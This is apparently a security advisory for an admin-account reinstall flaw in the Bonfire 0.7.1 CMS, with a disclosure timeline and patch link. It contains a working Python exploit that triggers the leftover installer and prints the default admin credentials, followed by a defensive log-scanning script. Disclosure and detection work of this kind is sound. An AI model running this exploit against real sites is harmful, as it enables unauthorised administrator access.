Bonefire 0.7.1 Reinstall Admin Account

2014.04.25
Credit: Mehmet INCE
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python
# coding: utf-8
#
# Bonefire v.0.7.1 Reinstall Admin Account Exploit
#
# Author : Mehmet INCE
#
# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
#
# Description :
#   Forgotten controls lead to call install module which lead to
#   create default administrator account again!
#
# TIMELINE
# 21 Apr 2014 14:00 - Vulnerability found
# 23 Apr 2014 21:20 - Analysis and write-up completed
# 23 Apr 2014 21:29 - First contact with lead developer of Bonfire
# 23 Apr 2014 21:33 - Response from lead developer
# 23 Apr 2014 21:52 - Vulnerability confirmed by lead developer
# 23 Apr 2014 21:55 - Vulnerability has been patched via following commit
#   https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
import urllib2
import sys
import re

# Validate the argument count before reading sys.argv
if len(sys.argv) != 3:
    print "Usage : python bonfire www.target.com /path/"
    sys.exit(1)

target = sys.argv[1]
path = sys.argv[2]

# Request the installer action that is still reachable after installation
content = urllib2.urlopen(target+path+"index.php/install/do_install").read()

# Match the address literally; unescaped square brackets form a regex
# character class that matches almost any response body
if re.search(re.escape('admin@mybonefire.com'), content):
    print "Target is vulnerable!"
    print "Username : admin@mybonefire.com"
    print "Password : password"
else:
    print "Target is not vulnerable..."
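For defenders, the request the script makes is easy to spot in web server access logs. The following Python 3 sketch is an added example, not part of the original advisory or of Bonfire: it scans logs in combined format for requests to the `install/do_install` path named above and separates requests the server actually served from those it rejected. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Apr/2014:21:10:02 +0000] "GET /index.php/install/do_install HTTP/1.1" 200 5120 "-" "Python-urllib/2.7"
198.51.100.4 - - [23/Apr/2014:21:11:40 +0000] "GET /index.php/users/login HTTP/1.1" 200 2301 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Apr/2014:21:12:15 +0000] "POST /index.php/login HTTP/1.1" 302 0 "-" "Python-urllib/2.7"
192.0.2.9 - - [24/Apr/2014:03:00:00 +0000] "GET /bonfire/index.php/install/do_install?x=1 HTTP/1.1" 404 310 "-" "curl/7.35"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# Path taken from the advisory; matched at the end of the URL path,
# with or without the index.php front controller in front of it.
INSTALL_RE = re.compile(r'(?:/index\.php)?/install/do_install/?$', re.IGNORECASE)

def find_install_hits(log_text):
    """Return one dict per request that targeted the installer action."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url_path = m.group("uri").split("?", 1)[0]  # ignore the query string
        if INSTALL_RE.search(url_path):
            status = int(m.group("status"))
            hits.append({
                "ip": m.group("ip"), "ts": m.group("ts"),
                "uri": m.group("uri"), "status": status,
                # 2xx/3xx: the installer ran; 4xx/5xx: blocked, absent or failed
                "served": 200 <= status < 400,
            })
    return hits

def summarize(hits):
    """Group served installer requests by client address."""
    by_ip = defaultdict(list)
    for h in hits:
        if h["served"]:
            by_ip[h["ip"]].append(h["ts"])
    return dict(by_ip)

if __name__ == "__main__":
    for hit in find_install_hits(SAMPLE_LOG):
        print(hit)
    print(summarize(find_install_hits(SAMPLE_LOG)))
```

A served hit on an already installed site means the default administrator account may have been recreated, so that account should be reviewed and the site updated to a version that contains the patch commit listed in the timeline.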




Copyright 2024, cxsecurity.com

 
